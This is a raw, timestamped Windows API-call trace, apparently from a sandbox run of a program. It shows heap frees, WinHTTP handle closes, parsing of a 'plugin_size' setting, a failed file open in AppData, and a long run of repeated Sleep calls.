[0206.693] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c20) returned 1 [0206.694] WinHttpCloseHandle (hInternet=0xad55d70) returned 1 [0206.694] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b60) returned 1 [0206.694] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881b40) returned 1 [0206.694] WinHttpCloseHandle (hInternet=0x9d437f0) returned 1 [0206.694] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881a20) returned 1 [0206.695] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881890) returned 1 [0206.695] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881930) returned 1 [0206.696] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0206.696] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x15) returned 0x9881890 [0206.696] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0206.696] lstrlenA (lpString="plugin_size") returned 11 [0206.696] atoi (_Str="0") returned 0 [0206.696] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0206.696] lstrlenA (lpString="|:|") returned 3 [0206.696] MapViewOfFile (hFileMappingObject=0x1cdc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x7f10000 [0206.705] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0206.705] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x7f10000) returned 0x0 [0206.725] atoi (_Str="0") returned 0 [0206.725] VirtualFree (lpAddress=0x590000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0206.726] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0206.727] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0206.823] Sleep (dwMilliseconds=0x258) [0206.873] Sleep (dwMilliseconds=0x258) [0206.935] Sleep (dwMilliseconds=0x258) [0207.063] Sleep (dwMilliseconds=0x258) [0207.131] Sleep (dwMilliseconds=0x258) [0207.176] Sleep (dwMilliseconds=0x258) [0207.259] Sleep (dwMilliseconds=0x258) [0207.333] Sleep (dwMilliseconds=0x258) [0207.437] Sleep (dwMilliseconds=0x258) [0207.507] Sleep (dwMilliseconds=0x258) [0207.682] Sleep (dwMilliseconds=0x258) [0207.791] Sleep (dwMilliseconds=0x258) [0207.875] Sleep (dwMilliseconds=0x258) [0208.042] Sleep (dwMilliseconds=0x258) [0208.122] Sleep (dwMilliseconds=0x258) [0208.179] Sleep (dwMilliseconds=0x258) [0208.233] Sleep (dwMilliseconds=0x258) [0208.312] Sleep (dwMilliseconds=0x258) [0208.383] Sleep (dwMilliseconds=0x258) [0208.435] Sleep (dwMilliseconds=0x258) [0208.510] Sleep (dwMilliseconds=0x258) [0208.706] Sleep (dwMilliseconds=0x258) [0208.768] Sleep (dwMilliseconds=0x258) [0208.834] Sleep (dwMilliseconds=0x258) [0208.916] Sleep (dwMilliseconds=0x258) [0209.047] Sleep (dwMilliseconds=0x258) [0209.094] Sleep (dwMilliseconds=0x258) [0209.165] Sleep (dwMilliseconds=0x258) [0209.247] Sleep (dwMilliseconds=0x258) [0209.323] Sleep (dwMilliseconds=0x258) [0209.363] Sleep (dwMilliseconds=0x258) [0209.451] Sleep (dwMilliseconds=0x258) [0209.523] Sleep (dwMilliseconds=0x258) [0209.577] Sleep (dwMilliseconds=0x258) [0209.642] Sleep (dwMilliseconds=0x258) [0209.716] Sleep (dwMilliseconds=0x258) [0209.810] Sleep (dwMilliseconds=0x258) [0209.863] Sleep (dwMilliseconds=0x258) [0209.936] Sleep (dwMilliseconds=0x258) [0210.043] Sleep (dwMilliseconds=0x258) [0210.090] Sleep (dwMilliseconds=0x258) [0210.154] Sleep (dwMilliseconds=0x258) [0210.225] Sleep (dwMilliseconds=0x258) [0210.289] Sleep (dwMilliseconds=0x258) [0210.342] Sleep (dwMilliseconds=0x258) [0210.420] Sleep (dwMilliseconds=0x258) [0210.546] Sleep (dwMilliseconds=0x258) [0210.598] Sleep (dwMilliseconds=0x258) [0210.673] Sleep (dwMilliseconds=0x258) [0210.750] Sleep (dwMilliseconds=0x258) [0210.822] Sleep (dwMilliseconds=0x258) [0210.878] Sleep (dwMilliseconds=0x258) [0211.103] Sleep (dwMilliseconds=0x258) [0211.185] Sleep (dwMilliseconds=0x258) [0211.262] Sleep (dwMilliseconds=0x258) [0211.335] Sleep (dwMilliseconds=0x258) [0211.388] Sleep (dwMilliseconds=0x258) [0211.467] Sleep (dwMilliseconds=0x258) [0211.542] Sleep (dwMilliseconds=0x258) [0211.632] Sleep (dwMilliseconds=0x258) [0211.715] Sleep (dwMilliseconds=0x258) [0211.789] Sleep (dwMilliseconds=0x258) [0211.875] Sleep (dwMilliseconds=0x258) [0211.947] Sleep (dwMilliseconds=0x258) [0211.987] Sleep (dwMilliseconds=0x258) [0212.101] Sleep (dwMilliseconds=0x258) [0212.214] Sleep (dwMilliseconds=0x258) [0212.310] Sleep (dwMilliseconds=0x258) [0212.397] Sleep (dwMilliseconds=0x258) [0212.483] Sleep (dwMilliseconds=0x258) [0212.559] Sleep (dwMilliseconds=0x258) [0212.621] Sleep (dwMilliseconds=0x258) [0212.669] Sleep (dwMilliseconds=0x258) [0212.742] Sleep (dwMilliseconds=0x258) [0212.781] Sleep (dwMilliseconds=0x258) [0212.835] Sleep (dwMilliseconds=0x258) [0212.889] Sleep (dwMilliseconds=0x258) [0212.930] Sleep (dwMilliseconds=0x258) [0212.976] Sleep (dwMilliseconds=0x258) [0213.035] Sleep (dwMilliseconds=0x258) [0213.067] Sleep (dwMilliseconds=0x258) [0213.105] Sleep (dwMilliseconds=0x258) [0213.146] Sleep (dwMilliseconds=0x258) [0213.224] Sleep (dwMilliseconds=0x258) [0213.296] Sleep (dwMilliseconds=0x258) [0213.414] Sleep (dwMilliseconds=0x258) [0213.734] Sleep (dwMilliseconds=0x258) [0213.883] Sleep (dwMilliseconds=0x258) [0213.995] Sleep (dwMilliseconds=0x258) [0214.108] Sleep (dwMilliseconds=0x258) [0214.263] Sleep (dwMilliseconds=0x258) [0214.338] Sleep (dwMilliseconds=0x258) [0214.412] Sleep (dwMilliseconds=0x258) [0214.466] Sleep (dwMilliseconds=0x258) [0214.550] Sleep (dwMilliseconds=0x258) [0214.594] Sleep (dwMilliseconds=0x258) [0214.636] Sleep (dwMilliseconds=0x258) [0214.677] Sleep (dwMilliseconds=0x258) [0214.716] Sleep (dwMilliseconds=0x258) [0214.819] Sleep (dwMilliseconds=0x258) [0214.910] Sleep (dwMilliseconds=0x258) [0214.978] Sleep (dwMilliseconds=0x258) [0215.051] Sleep (dwMilliseconds=0x258) [0215.134] Sleep (dwMilliseconds=0x258) [0215.264] Sleep (dwMilliseconds=0x258) [0215.347] Sleep (dwMilliseconds=0x258) [0215.425] Sleep (dwMilliseconds=0x258) [0215.478] Sleep (dwMilliseconds=0x258) [0215.540] Sleep (dwMilliseconds=0x258) [0215.614] Sleep (dwMilliseconds=0x258) [0215.723] Sleep (dwMilliseconds=0x258) [0215.808] Sleep (dwMilliseconds=0x258) [0215.898] Sleep (dwMilliseconds=0x258) [0215.995] Sleep (dwMilliseconds=0x258) [0216.046] Sleep (dwMilliseconds=0x258) [0216.107] Sleep (dwMilliseconds=0x258) [0216.180] Sleep (dwMilliseconds=0x258) [0216.286] Sleep (dwMilliseconds=0x258) [0216.361] Sleep (dwMilliseconds=0x258) [0216.452] Sleep (dwMilliseconds=0x258) [0216.525] Sleep (dwMilliseconds=0x258) [0216.588] Sleep (dwMilliseconds=0x258) [0216.662] Sleep (dwMilliseconds=0x258) [0216.738] Sleep (dwMilliseconds=0x258) [0216.809] Sleep (dwMilliseconds=0x258) [0216.980] Sleep (dwMilliseconds=0x258) [0217.113] Sleep (dwMilliseconds=0x258) [0217.186] Sleep (dwMilliseconds=0x258) [0217.275] Sleep (dwMilliseconds=0x258) [0217.328] Sleep (dwMilliseconds=0x258) [0217.402] Sleep (dwMilliseconds=0x258) [0217.465] Sleep (dwMilliseconds=0x258) [0217.527] Sleep (dwMilliseconds=0x258) [0217.605] Sleep (dwMilliseconds=0x258) [0217.681] Sleep (dwMilliseconds=0x258) [0217.743] Sleep (dwMilliseconds=0x258) [0217.792] Sleep (dwMilliseconds=0x258) [0217.872] Sleep (dwMilliseconds=0x258) [0217.946] Sleep (dwMilliseconds=0x258) [0218.031] Sleep (dwMilliseconds=0x258) [0218.169] Sleep (dwMilliseconds=0x258) [0218.284] Sleep (dwMilliseconds=0x258) [0218.366] Sleep (dwMilliseconds=0x258) [0218.421] Sleep (dwMilliseconds=0x258) [0218.495] Sleep (dwMilliseconds=0x258) [0218.568] Sleep (dwMilliseconds=0x258) [0218.646] Sleep (dwMilliseconds=0x258) [0218.721] Sleep (dwMilliseconds=0x258) [0218.793] Sleep (dwMilliseconds=0x258) [0218.888] Sleep (dwMilliseconds=0x258) [0218.965] Sleep (dwMilliseconds=0x258) [0219.049] Sleep (dwMilliseconds=0x258) [0219.174] Sleep (dwMilliseconds=0x258) [0219.323] Sleep (dwMilliseconds=0x258) [0219.403] Sleep (dwMilliseconds=0x258) [0219.488] Sleep (dwMilliseconds=0x258) [0219.536] Sleep (dwMilliseconds=0x258) [0219.609] Sleep (dwMilliseconds=0x258) [0219.673] Sleep (dwMilliseconds=0x258) [0219.714] Sleep (dwMilliseconds=0x258) [0219.790] Sleep (dwMilliseconds=0x258) [0219.875] Sleep (dwMilliseconds=0x258) [0219.953] Sleep (dwMilliseconds=0x258) [0220.002] Sleep (dwMilliseconds=0x258) [0220.069] Sleep (dwMilliseconds=0x258) [0220.172] Sleep (dwMilliseconds=0x258) [0220.301] Sleep (dwMilliseconds=0x258) [0220.375] Sleep (dwMilliseconds=0x258) [0220.492] Sleep (dwMilliseconds=0x258) [0220.550] Sleep (dwMilliseconds=0x258) [0220.572] Sleep (dwMilliseconds=0x258) [0220.593] Sleep (dwMilliseconds=0x258) [0220.642] Sleep (dwMilliseconds=0x258) [0220.717] Sleep (dwMilliseconds=0x258) [0220.809] Sleep (dwMilliseconds=0x258) [0220.893] Sleep (dwMilliseconds=0x258) [0220.975] Sleep (dwMilliseconds=0x258) [0221.066] Sleep (dwMilliseconds=0x258) [0221.115] Sleep (dwMilliseconds=0x258) [0221.245] Sleep (dwMilliseconds=0x258) [0221.320] Sleep (dwMilliseconds=0x258) [0221.394] Sleep (dwMilliseconds=0x258) [0221.481] Sleep (dwMilliseconds=0x258) [0221.556] Sleep (dwMilliseconds=0x258) [0221.686] Sleep (dwMilliseconds=0x258) [0221.743] Sleep (dwMilliseconds=0x258) [0221.819] Sleep (dwMilliseconds=0x258) [0221.882] Sleep (dwMilliseconds=0x258) [0221.973] Sleep (dwMilliseconds=0x258) [0222.052] Sleep (dwMilliseconds=0x258) [0222.100] Sleep (dwMilliseconds=0x258) [0222.179] Sleep (dwMilliseconds=0x258) [0222.279] Sleep (dwMilliseconds=0x258) [0222.334] Sleep (dwMilliseconds=0x258) [0222.411] Sleep (dwMilliseconds=0x258) [0222.481] Sleep (dwMilliseconds=0x258) [0222.555] Sleep (dwMilliseconds=0x258) [0222.627] Sleep (dwMilliseconds=0x258) [0222.710] Sleep (dwMilliseconds=0x258) [0222.768] Sleep (dwMilliseconds=0x258) [0222.918] Sleep (dwMilliseconds=0x258) [0222.952] Sleep (dwMilliseconds=0x258) [0223.004] Sleep (dwMilliseconds=0x258) [0223.116] Sleep (dwMilliseconds=0x258) [0223.196] Sleep (dwMilliseconds=0x258) [0223.343] Sleep (dwMilliseconds=0x258) [0223.420] Sleep (dwMilliseconds=0x258) [0223.495] Sleep (dwMilliseconds=0x258) [0223.555] Sleep (dwMilliseconds=0x258) [0223.566] Sleep (dwMilliseconds=0x258) [0223.602] Sleep (dwMilliseconds=0x258) [0223.681] Sleep (dwMilliseconds=0x258) [0223.738] Sleep (dwMilliseconds=0x258) [0223.778] Sleep (dwMilliseconds=0x258) [0223.842] Sleep (dwMilliseconds=0x258) [0223.889] Sleep (dwMilliseconds=0x258) [0223.909] Sleep (dwMilliseconds=0x258) [0223.946] Sleep (dwMilliseconds=0x258) [0223.986] Sleep (dwMilliseconds=0x258) [0224.072] Sleep (dwMilliseconds=0x258) [0224.116] Sleep (dwMilliseconds=0x258) [0224.156] Sleep (dwMilliseconds=0x258) [0224.188] Sleep (dwMilliseconds=0x258) [0224.228] Sleep (dwMilliseconds=0x258) [0224.262] Sleep (dwMilliseconds=0x258) [0224.315] Sleep (dwMilliseconds=0x258) [0224.395] Sleep (dwMilliseconds=0x258) [0224.469] Sleep (dwMilliseconds=0x258) [0224.518] Sleep (dwMilliseconds=0x258) [0224.591] Sleep (dwMilliseconds=0x258) [0224.663] Sleep (dwMilliseconds=0x258) [0224.718] Sleep (dwMilliseconds=0x258) [0224.779] Sleep (dwMilliseconds=0x258) [0224.857] Sleep (dwMilliseconds=0x258) [0224.932] Sleep (dwMilliseconds=0x258) [0224.987] Sleep (dwMilliseconds=0x258) [0225.069] Sleep (dwMilliseconds=0x258) [0225.142] Sleep (dwMilliseconds=0x258) [0225.290] Sleep (dwMilliseconds=0x258) [0225.402] Sleep (dwMilliseconds=0x258) [0225.519] Sleep (dwMilliseconds=0x258) [0225.639] Sleep (dwMilliseconds=0x258) [0225.754] Sleep (dwMilliseconds=0x258) [0225.847] Sleep (dwMilliseconds=0x258) [0225.925] Sleep (dwMilliseconds=0x258) [0225.997] Sleep (dwMilliseconds=0x258) [0226.036] Sleep (dwMilliseconds=0x258) [0226.114] Sleep (dwMilliseconds=0x258) [0226.186] Sleep (dwMilliseconds=0x258) [0226.263] Sleep (dwMilliseconds=0x258) [0226.332] Sleep (dwMilliseconds=0x258) [0226.505] Sleep (dwMilliseconds=0x258) [0226.584] Sleep (dwMilliseconds=0x258) [0226.627] Sleep (dwMilliseconds=0x258) [0226.666] Sleep (dwMilliseconds=0x258) [0226.744] Sleep (dwMilliseconds=0x258) [0226.825] Sleep (dwMilliseconds=0x258) [0226.882] Sleep (dwMilliseconds=0x258) [0226.920] Sleep (dwMilliseconds=0x258) [0226.966] Sleep (dwMilliseconds=0x258) [0227.043] Sleep (dwMilliseconds=0x258) [0227.139] Sleep (dwMilliseconds=0x258) [0227.235] Sleep (dwMilliseconds=0x258) [0227.293] Sleep (dwMilliseconds=0x258) [0227.377] Sleep (dwMilliseconds=0x258) [0227.493] Sleep (dwMilliseconds=0x258) [0227.540] Sleep (dwMilliseconds=0x258) [0227.651] Sleep (dwMilliseconds=0x258) [0227.726] Sleep (dwMilliseconds=0x258) [0227.785] Sleep (dwMilliseconds=0x258) [0227.847] Sleep (dwMilliseconds=0x258) [0227.923] Sleep (dwMilliseconds=0x258) [0228.003] Sleep (dwMilliseconds=0x258) [0228.049] Sleep (dwMilliseconds=0x258) [0228.122] Sleep (dwMilliseconds=0x258) [0228.246] Sleep (dwMilliseconds=0x258) [0228.306] Sleep (dwMilliseconds=0x258) [0228.358] Sleep (dwMilliseconds=0x258) [0228.475] Sleep (dwMilliseconds=0x258) [0228.553] Sleep (dwMilliseconds=0x258) [0228.627] Sleep (dwMilliseconds=0x258) [0228.717] Sleep (dwMilliseconds=0x258) [0228.864] Sleep (dwMilliseconds=0x258) [0228.924] Sleep (dwMilliseconds=0x258) [0228.997] Sleep (dwMilliseconds=0x258) [0229.068] Sleep (dwMilliseconds=0x258) [0229.103] Sleep (dwMilliseconds=0x258) [0229.147] Sleep (dwMilliseconds=0x258) [0229.261] Sleep (dwMilliseconds=0x258) [0229.338] Sleep (dwMilliseconds=0x258) [0229.385] Sleep (dwMilliseconds=0x258) [0229.488] Sleep (dwMilliseconds=0x258) [0229.564] Sleep (dwMilliseconds=0x258) [0229.623] Sleep (dwMilliseconds=0x258) [0229.680] Sleep (dwMilliseconds=0x258) [0229.755] Sleep (dwMilliseconds=0x258) [0229.847] Sleep (dwMilliseconds=0x258) [0229.870] Sleep (dwMilliseconds=0x258) [0229.902] Sleep (dwMilliseconds=0x258) [0229.977] Sleep (dwMilliseconds=0x258) [0230.041] Sleep (dwMilliseconds=0x258) [0230.140] Sleep (dwMilliseconds=0x258) [0230.299] Sleep (dwMilliseconds=0x258) [0230.385] Sleep (dwMilliseconds=0x258) [0230.506] Sleep (dwMilliseconds=0x258) [0230.597] Sleep (dwMilliseconds=0x258) [0230.688] Sleep (dwMilliseconds=0x258) [0230.749] Sleep (dwMilliseconds=0x258) [0230.806] Sleep (dwMilliseconds=0x258) [0230.895] Sleep (dwMilliseconds=0x258) [0230.985] Sleep (dwMilliseconds=0x258) [0231.042] Sleep (dwMilliseconds=0x258) [0231.195] Sleep (dwMilliseconds=0x258) [0231.300] Sleep (dwMilliseconds=0x258) [0231.359] Sleep (dwMilliseconds=0x258) [0231.411] Sleep (dwMilliseconds=0x258) [0231.496] Sleep (dwMilliseconds=0x258) [0231.577] Sleep (dwMilliseconds=0x258) [0231.625] Sleep (dwMilliseconds=0x258) [0231.700] Sleep (dwMilliseconds=0x258) [0231.789] Sleep (dwMilliseconds=0x258) [0231.854] Sleep (dwMilliseconds=0x258) [0231.890] Sleep (dwMilliseconds=0x258) [0231.930] Sleep (dwMilliseconds=0x258) [0232.006] Sleep (dwMilliseconds=0x258) [0232.078] Sleep (dwMilliseconds=0x258) [0232.142] Sleep (dwMilliseconds=0x258) [0232.190] Sleep (dwMilliseconds=0x258) [0232.289] Sleep (dwMilliseconds=0x258) [0232.406] Sleep (dwMilliseconds=0x258) [0232.456] Sleep (dwMilliseconds=0x258) [0232.523] Sleep (dwMilliseconds=0x258) [0232.651] Sleep (dwMilliseconds=0x258) [0232.718] Sleep (dwMilliseconds=0x258) [0232.750] Sleep (dwMilliseconds=0x258) [0232.830] Sleep (dwMilliseconds=0x258) [0232.906] Sleep (dwMilliseconds=0x258) [0232.992] Sleep (dwMilliseconds=0x258) [0233.064] Sleep (dwMilliseconds=0x258) [0233.115] Sleep (dwMilliseconds=0x258) [0233.182] Sleep (dwMilliseconds=0x258) [0233.275] Sleep (dwMilliseconds=0x258) [0233.338] Sleep (dwMilliseconds=0x258) [0233.395] Sleep (dwMilliseconds=0x258) [0233.480] Sleep (dwMilliseconds=0x258) [0233.607] Sleep (dwMilliseconds=0x258) [0233.727] Sleep (dwMilliseconds=0x258) [0233.807] Sleep (dwMilliseconds=0x258) [0233.887] Sleep (dwMilliseconds=0x258) [0233.945] Sleep (dwMilliseconds=0x258) [0233.998] Sleep (dwMilliseconds=0x258) [0234.070] Sleep (dwMilliseconds=0x258) [0234.145] Sleep (dwMilliseconds=0x258) [0234.182] Sleep (dwMilliseconds=0x258) [0234.281] Sleep (dwMilliseconds=0x258) [0234.361] Sleep (dwMilliseconds=0x258) [0234.422] Sleep (dwMilliseconds=0x258) [0234.486] Sleep (dwMilliseconds=0x258) [0234.570] Sleep (dwMilliseconds=0x258) [0234.632] Sleep (dwMilliseconds=0x258) [0234.671] Sleep (dwMilliseconds=0x258) [0234.754] Sleep (dwMilliseconds=0x258) [0234.795] Sleep (dwMilliseconds=0x258) [0234.865] Sleep (dwMilliseconds=0x258) [0234.888] Sleep (dwMilliseconds=0x258) [0234.925] Sleep (dwMilliseconds=0x258) [0234.962] Sleep (dwMilliseconds=0x258) [0234.964] Sleep (dwMilliseconds=0x258) [0235.002] Sleep (dwMilliseconds=0x258) [0235.038] Sleep (dwMilliseconds=0x258) [0235.052] Sleep (dwMilliseconds=0x258) [0235.054] Sleep (dwMilliseconds=0x258) [0235.079] Sleep (dwMilliseconds=0x258) [0235.114] Sleep (dwMilliseconds=0x258) [0235.150] Sleep (dwMilliseconds=0x258) [0235.161] Sleep (dwMilliseconds=0x258) [0235.239] Sleep (dwMilliseconds=0x258) [0235.281] Sleep (dwMilliseconds=0x258) [0235.289] Sleep (dwMilliseconds=0x258) [0235.319] Sleep (dwMilliseconds=0x258) [0235.360] Sleep (dwMilliseconds=0x258) [0235.383] Sleep (dwMilliseconds=0x258) [0235.385] Sleep (dwMilliseconds=0x258) [0235.400] Sleep (dwMilliseconds=0x258) [0235.435] Sleep (dwMilliseconds=0x258) [0235.472] Sleep (dwMilliseconds=0x258) [0235.473] Sleep (dwMilliseconds=0x258) [0235.510] Sleep (dwMilliseconds=0x258) [0235.550] Sleep (dwMilliseconds=0x258) [0235.562] Sleep (dwMilliseconds=0x258) [0235.564] Sleep (dwMilliseconds=0x258) [0235.592] Sleep (dwMilliseconds=0x258) [0235.628] Sleep (dwMilliseconds=0x258) [0235.658] Sleep (dwMilliseconds=0x258) [0235.659] Sleep (dwMilliseconds=0x258) [0235.682] Sleep (dwMilliseconds=0x258) [0235.719] Sleep (dwMilliseconds=0x258) [0235.757] Sleep (dwMilliseconds=0x258) [0235.759] Sleep (dwMilliseconds=0x258) [0235.795] Sleep (dwMilliseconds=0x258) [0235.839] Sleep (dwMilliseconds=0x258) [0235.855] Sleep (dwMilliseconds=0x258) [0235.858] Sleep (dwMilliseconds=0x258) [0235.904] Sleep (dwMilliseconds=0x258) [0235.959] Sleep (dwMilliseconds=0x258) [0235.994] Sleep (dwMilliseconds=0x258) [0235.999] Sleep (dwMilliseconds=0x258) [0236.008] Sleep (dwMilliseconds=0x258) [0236.045] Sleep (dwMilliseconds=0x258) [0236.083] Sleep (dwMilliseconds=0x258) [0236.094] Sleep (dwMilliseconds=0x258) [0236.122] Sleep (dwMilliseconds=0x258) [0236.161] Sleep (dwMilliseconds=0x258) [0236.186] Sleep (dwMilliseconds=0x258) [0236.230] Sleep (dwMilliseconds=0x258) [0236.275] Sleep (dwMilliseconds=0x258) [0236.314] Sleep (dwMilliseconds=0x258) [0236.321] Sleep (dwMilliseconds=0x258) [0236.322] Sleep (dwMilliseconds=0x258) [0236.356] Sleep (dwMilliseconds=0x258) [0236.396] Sleep (dwMilliseconds=0x258) [0236.418] Sleep (dwMilliseconds=0x258) [0236.436] Sleep (dwMilliseconds=0x258) [0236.477] Sleep (dwMilliseconds=0x258) [0236.540] Sleep (dwMilliseconds=0x258) [0236.544] Sleep (dwMilliseconds=0x258) [0236.583] Sleep (dwMilliseconds=0x258) [0236.623] Sleep (dwMilliseconds=0x258) [0236.644] Sleep (dwMilliseconds=0x258) [0236.662] Sleep (dwMilliseconds=0x258) [0236.708] Sleep (dwMilliseconds=0x258) [0236.743] Sleep (dwMilliseconds=0x258) [0236.748] Sleep (dwMilliseconds=0x258) [0236.786] Sleep (dwMilliseconds=0x258) [0236.832] Sleep (dwMilliseconds=0x258) [0236.846] Sleep (dwMilliseconds=0x258) [0236.851] Sleep (dwMilliseconds=0x258) [0236.876] Sleep (dwMilliseconds=0x258) [0236.911] Sleep (dwMilliseconds=0x258) [0236.945] Sleep (dwMilliseconds=0x258) [0236.953] Sleep (dwMilliseconds=0x258) [0236.993] Sleep (dwMilliseconds=0x258) [0237.034] Sleep (dwMilliseconds=0x258) [0237.043] Sleep (dwMilliseconds=0x258) [0237.146] Sleep (dwMilliseconds=0x258) [0237.185] Sleep (dwMilliseconds=0x258) [0237.247] Sleep (dwMilliseconds=0x258) [0237.248] Sleep (dwMilliseconds=0x258) [0237.263] Sleep (dwMilliseconds=0x258) [0237.298] Sleep (dwMilliseconds=0x258) [0237.335] Sleep (dwMilliseconds=0x258) [0237.340] Sleep (dwMilliseconds=0x258) [0237.377] Sleep (dwMilliseconds=0x258) [0237.413] Sleep (dwMilliseconds=0x258) [0237.426] Sleep (dwMilliseconds=0x258) [0237.427] Sleep (dwMilliseconds=0x258) [0237.459] Sleep (dwMilliseconds=0x258) [0237.499] Sleep (dwMilliseconds=0x258) [0237.524] Sleep (dwMilliseconds=0x258) [0237.528] Sleep (dwMilliseconds=0x258) [0237.542] Sleep (dwMilliseconds=0x258) [0237.581] Sleep (dwMilliseconds=0x258) [0237.618] Sleep (dwMilliseconds=0x258) [0237.625] Sleep (dwMilliseconds=0x258) [0237.657] Sleep (dwMilliseconds=0x258) [0237.699] Sleep (dwMilliseconds=0x258) [0237.724] Sleep (dwMilliseconds=0x258) [0237.726] Sleep (dwMilliseconds=0x258) [0237.742] Sleep (dwMilliseconds=0x258) [0237.778] Sleep (dwMilliseconds=0x258) [0237.827] Sleep (dwMilliseconds=0x258) [0237.863] Sleep (dwMilliseconds=0x258) [0237.903] Sleep (dwMilliseconds=0x258) [0237.919] Sleep (dwMilliseconds=0x258) [0237.941] Sleep (dwMilliseconds=0x258) [0237.977] Sleep (dwMilliseconds=0x258) [0238.008] Sleep (dwMilliseconds=0x258) [0238.009] Sleep (dwMilliseconds=0x258) [0238.017] Sleep (dwMilliseconds=0x258) [0238.051] Sleep (dwMilliseconds=0x258) [0238.092] Sleep (dwMilliseconds=0x258) [0238.097] Sleep (dwMilliseconds=0x258) [0238.098] Sleep (dwMilliseconds=0x258) [0238.131] Sleep (dwMilliseconds=0x258) [0238.174] Sleep (dwMilliseconds=0x258) [0238.191] Sleep (dwMilliseconds=0x258) [0238.192] Sleep (dwMilliseconds=0x258) [0238.288] Sleep (dwMilliseconds=0x258) [0238.329] Sleep (dwMilliseconds=0x258) [0238.363] Sleep (dwMilliseconds=0x258) [0238.371] Sleep (dwMilliseconds=0x258) [0238.407] Sleep (dwMilliseconds=0x258) [0238.444] Sleep (dwMilliseconds=0x258) [0238.450] Sleep (dwMilliseconds=0x258) [0238.451] Sleep (dwMilliseconds=0x258) [0238.486] Sleep (dwMilliseconds=0x258) [0238.521] Sleep (dwMilliseconds=0x258) [0238.551] Sleep (dwMilliseconds=0x258) [0238.570] Sleep (dwMilliseconds=0x258) [0238.608] Sleep (dwMilliseconds=0x258) [0238.649] Sleep (dwMilliseconds=0x258) [0238.652] Sleep (dwMilliseconds=0x258) [0238.654] Sleep (dwMilliseconds=0x258) [0238.690] Sleep (dwMilliseconds=0x258) [0238.731] Sleep (dwMilliseconds=0x258) [0238.779] Sleep (dwMilliseconds=0x258) [0238.781] Sleep (dwMilliseconds=0x258) [0238.800] Sleep (dwMilliseconds=0x258) [0238.845] Sleep (dwMilliseconds=0x258) [0238.880] Sleep (dwMilliseconds=0x258) [0238.887] Sleep (dwMilliseconds=0x258) [0238.923] Sleep (dwMilliseconds=0x258) [0238.961] Sleep (dwMilliseconds=0x258) [0238.968] Sleep (dwMilliseconds=0x258) [0238.998] Sleep (dwMilliseconds=0x258) [0239.035] Sleep (dwMilliseconds=0x258) [0239.052] Sleep (dwMilliseconds=0x258) [0239.054] Sleep (dwMilliseconds=0x258) [0239.073] Sleep (dwMilliseconds=0x258) [0239.110] Sleep (dwMilliseconds=0x258) [0239.139] Sleep (dwMilliseconds=0x258) [0239.140] Sleep (dwMilliseconds=0x258) [0239.152] Sleep (dwMilliseconds=0x258) [0239.189] Sleep (dwMilliseconds=0x258) [0239.245] Sleep (dwMilliseconds=0x258) [0239.251] Sleep (dwMilliseconds=0x258) [0239.252] Sleep (dwMilliseconds=0x258) [0239.285] Sleep (dwMilliseconds=0x258) [0239.320] Sleep (dwMilliseconds=0x258) [0239.340] Sleep (dwMilliseconds=0x258) [0239.363] Sleep (dwMilliseconds=0x258) [0239.405] Sleep (dwMilliseconds=0x258) [0239.431] Sleep (dwMilliseconds=0x258) [0239.499] Sleep (dwMilliseconds=0x258) [0239.543] Sleep (dwMilliseconds=0x258) [0239.580] Sleep (dwMilliseconds=0x258) [0239.596] Sleep (dwMilliseconds=0x258) [0239.620] Sleep (dwMilliseconds=0x258) [0239.706] Sleep (dwMilliseconds=0x258) [0239.732] Sleep (dwMilliseconds=0x258) [0239.753] Sleep (dwMilliseconds=0x258) [0239.791] Sleep (dwMilliseconds=0x258) [0239.837] Sleep (dwMilliseconds=0x258) [0239.840] Sleep (dwMilliseconds=0x258) [0239.876] Sleep (dwMilliseconds=0x258) [0239.935] Sleep (dwMilliseconds=0x258) [0239.993] Sleep (dwMilliseconds=0x258) [0240.052] Sleep (dwMilliseconds=0x258) [0240.126] Sleep (dwMilliseconds=0x258) [0240.233] Sleep (dwMilliseconds=0x258) [0240.264] Sleep (dwMilliseconds=0x258) [0240.337] Sleep (dwMilliseconds=0x258) [0240.394] Sleep (dwMilliseconds=0x258) [0240.454] Sleep (dwMilliseconds=0x258) [0240.507] Sleep (dwMilliseconds=0x258) [0240.565] Sleep (dwMilliseconds=0x258) [0240.676] Sleep (dwMilliseconds=0x258) [0240.753] Sleep (dwMilliseconds=0x258) [0240.854] Sleep (dwMilliseconds=0x258) [0240.924] Sleep (dwMilliseconds=0x258) [0240.980] Sleep (dwMilliseconds=0x258) [0241.036] Sleep (dwMilliseconds=0x258) [0241.109] Sleep (dwMilliseconds=0x258) [0241.245] Sleep (dwMilliseconds=0x258) [0241.304] Sleep (dwMilliseconds=0x258) [0241.375] Sleep (dwMilliseconds=0x258) [0241.438] Sleep (dwMilliseconds=0x258) [0241.463] Sleep (dwMilliseconds=0x258) [0241.475] Sleep (dwMilliseconds=0x258) [0241.516] Sleep (dwMilliseconds=0x258) [0241.553] Sleep (dwMilliseconds=0x258) [0241.557] Sleep (dwMilliseconds=0x258) [0241.595] Sleep (dwMilliseconds=0x258) [0241.633] Sleep (dwMilliseconds=0x258) [0241.651] Sleep (dwMilliseconds=0x258) 